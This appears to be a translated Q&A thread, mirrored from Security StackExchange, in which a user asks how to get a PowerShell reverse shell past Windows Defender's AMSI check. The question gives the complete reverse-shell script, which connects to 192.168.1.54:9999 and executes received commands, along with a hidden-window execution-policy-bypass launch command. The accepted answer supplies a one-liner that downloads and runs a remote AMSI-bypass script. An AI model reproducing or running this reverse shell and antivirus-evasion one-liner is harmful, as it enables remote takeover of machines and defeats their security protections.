首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >绕过AMSI Windows 10

绕过AMSI Windows 10
EN

Security用户
提问于 2020-05-11 23:41:50
回答 1查看 2.3K关注 0票数 2

我试着在windows 10上运行一个powershell反向外壳。无论如何,每次它被Wndow防御程序阻塞时。我怎么能绕过它?

在一个文件中我存储有效载荷

代码语言:javascript
复制
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.54',9999);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{;
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close();

然后我使用xencrypt混淆代码,但是当我运行powershell -NoP -NonI -W Hidden -Exec Bypass .\revshell.ps1

我得到了

代码语言:javascript
复制
Questo script include contenuto dannoso ed è stato bloccato dal software antivirus.
In riga:18 car:1
+ IEX($piifnga)
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand 

问题:有办法绕过这个检查吗?

EN

回答 1

Security用户

回答已采纳

发布于 2020-06-19 09:51:54

  1. 打开powershell
  2. 使用Get-ExecutionPolicy -List列出执行策略
  3. 如果LocalMachineRestricted而你不是管理员..。
  4. ...you可以使用Set-ExecutionPolicy -Scope Process Unrestricted在本地更改策略,这允许您执行存储在机器上的.ps脚本.
  5. ...anyway仍然不能运行恶意内容。所以绕开AMSI

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/aloksaurabh/OffenPowerSh/master/Bypass/Invoke-AlokS-AvBypass.ps1'); Invoke-AlokS-AvBypass

  1. 现在,无论您执行ScriptContainedMaliciousContent消息的脚本是什么,它都不再显示
票数 0
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/231508

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档